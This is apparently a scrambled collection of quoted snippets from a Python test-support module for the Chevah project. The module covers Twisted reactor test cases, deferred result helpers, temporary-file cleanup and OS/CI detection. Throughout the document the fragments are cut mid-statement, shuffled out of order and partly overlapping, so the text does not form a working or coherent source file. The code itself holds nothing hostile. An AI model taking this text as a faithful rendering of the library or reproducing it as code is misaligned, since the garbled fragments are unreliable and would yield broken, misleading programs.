arguments. if not inspect.isclass(expected_type): expected_type, value", "delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls',", "# No need to look for other things as we", "except (RuntimeError, KeyError): # FIXME:863: # When running threads tests", "utf-8 -*- # Copyright (c) 2011 <NAME>. # See LICENSE", "result instead\" % ( deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success", "0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted", "(c) 2011 <NAME>. # See LICENSE for details. \"\"\" TestCase", "privileges to normal users.''' if cls._drop_user == '-': return os.environ['USERNAME']", "of all delayed calls from reactor queue. \"\"\" result =", "in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member)", "the end of a test reactor run. 
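Any pending timeout call is cancelled before deciding whether the
reactor itself should be stopped.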
When prevent_stop=True, the", "noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks", "excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True", "if not isinstance(deferred, Deferred): raise AssertionError('This is not a deferred.')", "have_callbacks = True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader):", "= True if not is_exception: # No need to look", "family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed by", "return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if", "in temp which is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix,", "Create a new temp folder and return its path and", "deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor until", "iterations = [False] * (count - 1) iterations.append(True) self.executeReactorUntil( lambda", "CI on which the tests are currently executed. \"\"\" if", "except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. #", "# No need to look for other delayed calls. have_callbacks", "the error. self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') # Look", "result expected on %r, found %r instead\" % ( deferred,", "it returns `osx` followed by the version. It is not", "success_state = None if success_state is None: raise AssertionError('Failed to", "to clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class", "specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else:", "SkipTest try: from twisted.internet.defer import Deferred from twisted.internet.posixbase import (", "has no result, has a success result, or has an", "the delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function", "are running the test suite as super user, # we", "# Look at threads queue and active thread. if len(reactor.threadCallQueue)", "deferred.') if timeout is None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout)", "hostname does not change during test and this # should", "inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None if success is", "is the distribution name and the version. On Windows it", "self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a", "never be called. \"\"\" if not reactor.threadpool: return [] result", "wait for them when running the reactor. EXCEPTED_DELAYED_CALLS = []", "deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return the", "base == 'x86_64': return 'x64' return base _CI_NAMES = Bunch(", "= thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active", "recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors", "unicode. \"\"\" if ( isinstance(first, text_type) and not isinstance(second, text_type)", "from wmi import WMI local_wmi = WMI('.') query = (", "stop the reactor. 
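Usage, a minimal sketch mirroring the FTP example used elsewhere in
this class::

    protocol.makeConnection(transport)
    protocol.lineReceived('FEAT')
    self.executeReactor()
    result = transport.value()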
\"\"\" if timeout is None: timeout =", "second to wait for a deferred to have a result.", "delayed_str: is_exception = True if not is_exception: # No need", "system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP)", "attribute.') return success def tearDown(self): try: if self._caller_success_member: # Check", "self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 = reactor.timeout() # For testing", "the next cleanups will continue to be called and the", "LocalTestFilesystem # For Python below 2.7 we use the separate", "errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return `True`", "case the original deferred returns another deferred. Usage:: checker =", "for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if ( not", "it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs)", "major and minor NT version. It is not the marketing", "reactor will not be stopped. \"\"\" if not self._timeout_reached: #", "chain and the last callback or errback raised an exception", "return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if", "writers or threads are in the queues. Set run_once=True to", "Bunch Mock = Mock #: Obsolete. Please use self.patch and", "start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def", "already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception = False for", "reactor. This will do recursive calls, in case the original", "no result, has a success result, or has an unexpected", "resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import", "https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed by the version.", "timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start", "unittest2 module. # It comes by default in Python 2.7.", "been called on it and it has reached the end", "threadpool does not exists. This should only be called at", "except ValueError: # noqa:cover # Timeout might be no longer", "= True failure = AssertionError( 'Reactor took more than %.2f", "previous run. if reactor._started: return reactor._startedBefore = False reactor._started =", "True break # No need to look for other things", "which is executed from another thread. # removeAll might fail", "raise AssertionError( 'Reactor queue still contains delayed deferred.\\n' '%s' %", "self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called when start", "a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True)", "kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source):", "not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise AssertionError(", "checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred)", "_executeDeferred(self, deferred, timeout, debug): \"\"\" Does the actual deferred execution.", "threads from pool, or empty list when threadpool does not", "cleanup methods. 
If a cleanup fails, the next cleanups will", "noqa:cover # When debug is enabled with iterate using a", "text_type from six.moves import range import contextlib import inspect import", "have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check", "and the last callback or errback raised an exception or", "self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager", "took more than %.2f seconds to execute.' % timeout) self._reactor_timeout_failure", "socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific code.", "= ld.id() if distro_name == 'arch': # Arch has no", "temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for", "user for file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP", "parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if os_name", "import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem # For", "self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside", "self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with stop", "@classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in kilo", "import TestCase # Shut up you linter. TestCase else: from", "means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and", "string representation of all delayed calls from reactor queue. \"\"\"", "deferred deferred.addErrback(lambda _: None) self.fail( \"No result expected on %r,", "self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string representation", "delayed calls from reactor queue. \"\"\" result = [] for", "# We assume that hostname does not change during test", "%s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n'", "If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370: #", "swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This means", "os_name = os.uname()[0].lower() if os_name == 'darwin': parts = platform.mac_ver()[0].split('.')", "hostname as resolved by default DNS resolver. \"\"\" return socket.gethostname()", "for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True", "\"\"\" Create a folder in the default temp folder and", "# Don't continue with stop procedure. return # Let the", "for active jobs in thread pool. if reactor.threadpool: if (", "break except KeyError: success = None if success is None:", "def raise_failure(location, reason): raise AssertionError( 'Reactor is not clean. %s:", "'nt-%s.%s' % (parts[0], parts[1]) # We are now in Unix", "msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key]", "Return the current success result of C{deferred} or raise C{self.failException}.", "\"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first,", "generic patching. 
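Usage, a minimal sketch (the patched target is hypothetical)::

    with self.patch('some.module.attribute') as mock_attr:
        mock_attr.return_value = 42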
\"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs):", "failure = deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\"", "result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \" or", "is unicode while second is str for \"%s\".' % (", "This should only be called at teardown. \"\"\" if reactor", "function(*args, **kwargs) except Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__", "For testing we want to force to reactor to wake", "import LocalTestFilesystem # For Python below 2.7 we use the", "(parts[0], parts[1]) if os_name == 'sunos': parts = platform.release().split('.') return", "self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check that deferred", "Called at the end of a test reactor run. When", "level integration code, where you don't have the change to", "second is unicode for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8'))", "callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args,", "@classmethod def setUpClass(cls): # FIXME:924: # Disabled when we can", "import ld distro_name = ld.id() if distro_name == 'arch': #", "message = u'%s not in %s.' % (repr(source), repr(target)) raise", "True continue for reader in reactor.getReaders(): have_callbacks = True for", "In most tests you would like to use `getDeferredFailure` or", "and 'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME'", "reader_type): excepted = True break if not excepted: # noqa:cover", "\"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure =", "= mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result)", "thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError(", "self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover", "@staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for patching objects. \"\"\"", "of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not supported.') def", "list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first, second, msg):", "self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\" Create", "C{deferred} or raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has", "setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only to clean the home", "by the failure result is not one of the types", "None) def assertIsFailure(self, deferred): \"\"\" Check that deferred is a", "distro_version = ld.version().split('.', 1)[0] return '%s-%s' % (distro_name, distro_version) def", "`expected_type` \"\"\" # In Python 2.7 isInstance is already defined,", "test reactor run. 
When prevent_stop=True, the reactor will not be", "suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file", "User will be created before running the test case and", "code, where you don't have the change to get a", "def callCleanup(self): \"\"\" Call all cleanup methods. If a cleanup", "mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred)", "Test case for Twisted specific code. Provides support for running", "excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if", "+ 0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): \"\"\" Return", "\"success\" attribute.') return success def tearDown(self): try: if self._caller_success_member: #", "_threadPoolQueue(self): \"\"\" Return current tasks of thread Pool, or []", "that hostname does not change during test and this #", "mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args,", "prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments) for a new", "debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug): \"\"\"", "checks into a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder(", "delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred( self,", "os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME' not in os.environ:", "checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout,", "segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path,", "wake at an # interval of at most 1 second.", "its path and segments, which is auto cleaned. \"\"\" segments", "yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the current failure on", "which should not be considered as # required to wait", "to stop waiting for a deferred. _reactor_timeout_call = None def", "errback raised an exception or returned a L{failure.Failure}. @type deferred:", "if is OK for thread to exist after test is", "reactor is None: return def raise_failure(location, reason): raise AssertionError( 'Reactor", "only be called at teardown. \"\"\" if reactor is None:", "folder is clean at exit. \"\"\" os_name = process_capabilities.os_name os_family", "] errors = [] for check in checks: try: check()", "should only be called at cleanup as it removes elements", "if `value` is not an instance of `expected_type` \"\"\" #", "pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking():", "not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\"", "code. Provides support for running deferred and start/stop the reactor", "for running deferred and start/stop the reactor during tests. \"\"\"", "Run the deferred and return the result. 
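A failure result is not returned; it is reported as a test failure
via assertIsNotFailure.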
Usage:: checker =", "deferred.called if self._timeout_reached: raise AssertionError( 'Deferred took more than %d", "size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' %", "raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads():", "cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ", "the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\"", "= 1 # List of names for delayed calls which", "distro_name in ['centos', 'ol']: # Normalize all RHEL variants. distro_name", "import socket import sys import time from bunch import Bunch", "no result instead\" % ( deferred,)) elif not isinstance(result[0], Failure):", "self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working',", "Bunch = Bunch Mock = Mock #: Obsolete. Please use", "reactor during tests. \"\"\" # Number of second to wait", "the test suite as super user, # we use super", "deferred,)) elif not isinstance(result[0], Failure): self.fail( \"Failure result expected on", "stacked cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self):", "self.fail( \"No result expected on %r, found %r instead\" %", "= cls._drop_user os.environ['USER'] = cls._drop_user # Test suite should be", "prevent_stop=True, the reactor will not be stopped. \"\"\" if not", "'nt': from wmi import WMI local_wmi = WMI('.') query =", "segments) for a path which is not created yet but", "temporary files or folders left over.\\n %s' % ( '\\n'.join(errors))))", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result", "def setUpTestUser(cls): \"\"\" Set-up OS user for file system testing.", "'%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the CPU", "\"\"\" # FIXME:922: # Move all filesystem checks into a", "cleanup purpose and should not be used by normal tests.", "delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover #", "returns `True`. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT", "lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1,", "avoid propagating the error into the reactor. \"\"\" self.assertWasCalled(deferred) if", "executed and will not stop the reactor. \"\"\" if timeout", "result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has", "while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self,", "to make sure we don't compare str with unicode. \"\"\"", "required to wait for them when running the reactor. EXCEPTED_DELAYED_CALLS", "to wait at least for delayed calls. if have_callbacks: continue", "reactor. 
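# reactor.stop() only schedules the shutdown events; they are
# executed by the extra reactor.iterate() call below.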
reactor.stop() # Let the reactor run one more time", "'').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin):", "successResultOf(self, deferred): \"\"\" Return the current success result of C{deferred}", ") cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile:", "the startup events, so we need # to restore them.", "= self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str)", "actual deferred execution. \"\"\" if not deferred.called: deferred_done = False", "is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This", "os.name == 'nt': parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0],", "TestCase # Shut up you linter. TestCase else: from unittest", "queue, which will never be called. \"\"\" if not reactor.threadpool:", "used in the brink.sh script. \"\"\" base = platform.processor() if", "assertion error if deferred is a Failure. The failed deferred", "the reactor if it is already started. # This can", "call lsb_release. import ld distro_name = ld.id() if distro_name ==", "we are running the test suite as super user, #", "( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and", "deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is low level method.", "= None def _get_hostname(): \"\"\" Return hostname as resolved by", "change during test and this # should save a few", "return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import WMI", "return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success' member from", "success is None: raise AssertionError('Failed to find \"success\" attribute.') return", "== 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true': return", "\"\"\" Context manager for stacked cleanups. \"\"\" try: self.enterCleanup() yield", "os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in os.environ and 'USER' not", "( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool", "raises error in timeout, stops the reactor. This will do", "cleanup fails, the next cleanups will continue to be called", "reactor and stop it at the end. \"\"\" iterations =", "**kwargs): \"\"\" Helper for generic patching. \"\"\" return patch(*args, **kwargs)", "%r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return `True` if", "**kwargs): \"\"\" Helper for patching objects. \"\"\" return patch.object(*args, **kwargs)", "None _drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ =", "patchObject(*args, **kwargs): \"\"\" Helper for patching objects. \"\"\" return patch.object(*args,", "False # Start running has consumed the startup events, so", "assertIn(self, target, source): \"\"\" Overwrite stdlib to swap the arguments.", "'\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks of thread Pool,", "= [] def cb(res): result.append(res) return res deferred.addBoth(cb) if result:", "for details. \"\"\" TestCase used for Chevah project. 
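It provides TwistedTestCase, ChevahTestCase, FileSystemTestCase and
OSAccountFileSystemTestCase.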
\"\"\" from", "from unittest import TestCase try: # Import reactor last in", "= sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key] for key", "% ( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type)", "you would like to use one of the `getDeferredFailure` or", "using a small delay in steps, # to have a", "# will not spin the reactor. # To not slow", "mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import", "if delayed is self._reactor_timeout_call: continue if not delayed.func: # Was", "on %r, found no result instead\" % ( deferred,)) elif", "reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: #", "Assert that C{deferred} does not have a result at this", "result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure", "result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run", "text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7", "We only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On", "loop. Starts the reactor, waits for deferred execution, raises error", "content='', prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments) for a", "os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import mk from", "for a clean reactor at shutdown, only if test #", "a result. \"\"\" # FIXME:1370: # Remove / re-route this", "_: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\"", "debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the", "one of the types provided, then this test will fail.", "is already a failure, the self.fail below will # report", "to look for other delayed calls. have_callbacks = True break", "try: check() except AssertionError as error: errors.append(error.message) if errors: #", "the stdlib call to allow non-context usage. \"\"\" super_assertRaises =", "folder_segments. Return a list of members which were removed. \"\"\"", "or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport)", "the None test case. \"\"\" success = None for i", "None or t2 > 1: t2 = 0.1 t =", "# noqa:cover # When debug is enabled with iterate using", "FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all file-system tests using", "= None if success is None: raise AssertionError('Failed to find", "tests the reactor touched from the test # case itself", "already started. # This can happen if we prevent stop", "self._reactor_timeout_failure is not None: self._reactor_timeout_failure = None # We stop", "them when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS =", "sure we don't compare str with unicode. \"\"\" if (", "self._caller_success_member: # Check for a clean reactor at shutdown, only", "not one of the types provided, then this test will", "Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def", "os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to normal users.'''", "and this # should save a few DNS queries. 
hostname", "checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred):", "self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values", "module. # It comes by default in Python 2.7. if", "result, or has an unexpected failure result. @return: The failure", "not be stopped. \"\"\" if not self._timeout_reached: # Everything fine,", "in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in os.environ and", "as used in the brink.sh script. \"\"\" base = platform.processor()", "_SIGCHLDWaker, ] # Scheduled event to stop waiting for a", "= self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\"", "text_type) and not isinstance(second, text_type) ): # noqa:cover if not", "self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None @property def _caller_success_member(self):", "reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return", "self._threadPoolWorking(), ) ) t2 = reactor.timeout() # For testing we", "no result instead\" % ( deferred,)) elif isinstance(result[0], Failure): self.fail(", "and mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return", "# Might be canceled from the separate thread. # AttributeError", "== 'sunos': parts = platform.release().split('.') return 'solaris-%s' % (parts[1],) if", "Create a file in the default temp folder and mark", "file created in temp which is auto cleaned. \"\"\" segments", "or writers or threads are in the queues. Set run_once=True", "reactor has no delayed calls, readers or writers. This should", "for function, args, kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs) except", "assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements =", "None if success_state is None: raise AssertionError('Failed to find \"success\"", "# We stop the reactor on failures. self._shutdownTestReactor() raise AssertionError(", "twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import", "\"\"\" Test case for tests that need a dedicated local", "= mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred)", "\"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) #", "def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None", "def cb(res): result.append(res) return res deferred.addBoth(cb) if result: # If", "# Normalize all RHEL variants. distro_name = 'rhel' distro_version =", "Do the steps required to initiate a reactor for testing.", "after test is done. \"\"\" for exception in self.excepted_threads: if", "def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys", "user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest", "Return a list of members which were removed. 
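When only_marked is set, only members whose name contains
TEST_NAME_MARKER are deleted.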
\"\"\" if", "assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around the stdlib", "use super filesystem for cleaning. if cls._environ_user == cls._drop_user: temp_avatar", "result: # If there is already a failure, the self.fail", "\"\"\" Test case for Twisted specific code. Provides support for", "== 'nt': parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1])", "we run with a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self,", "readers or writers. This should only be called at teardown.", "= mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT')", "in the queues. Set run_once=True to only run the reactor", "u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working:", "( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' %", "not msg: msg = u'First is str while second is", "self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do the steps", "threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if errors:", "Twisted 13.0. result = [] deferred.addBoth(result.append) if not result: self.fail(", "return 'nt-%s.%s' % (parts[0], parts[1]) # We are now in", "[] else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all", "( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: #", "jobs in thread pool. if reactor.threadpool: if ( reactor.threadpool.working or", "return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage", "six.moves import range import contextlib import inspect import threading import", "msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements =", "result instead\" % ( deferred,)) elif not isinstance(result[0], Failure): self.fail(", "version. On Windows it is the `nt` followed by the", "_get_ci_name() CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List", "= False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor.", "assertIsFailure(self, deferred): \"\"\" Check that deferred is a failure. \"\"\"", "# No need for the full thread name excepted_threads =", "*args, **kwargs): \"\"\" Overwrite unit-test behaviour to run cleanup method", "some test will fail as they # will not spin", "fail since it detects that internal state # is changed", "in delayed_str: is_exception = True if not is_exception: # No", "tests are currently executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true':", "is useful if you have persistent deferred which will be", "running has consumed the startup events, so we need #", "kwargs)) def callCleanup(self): \"\"\" Call all cleanup methods. 
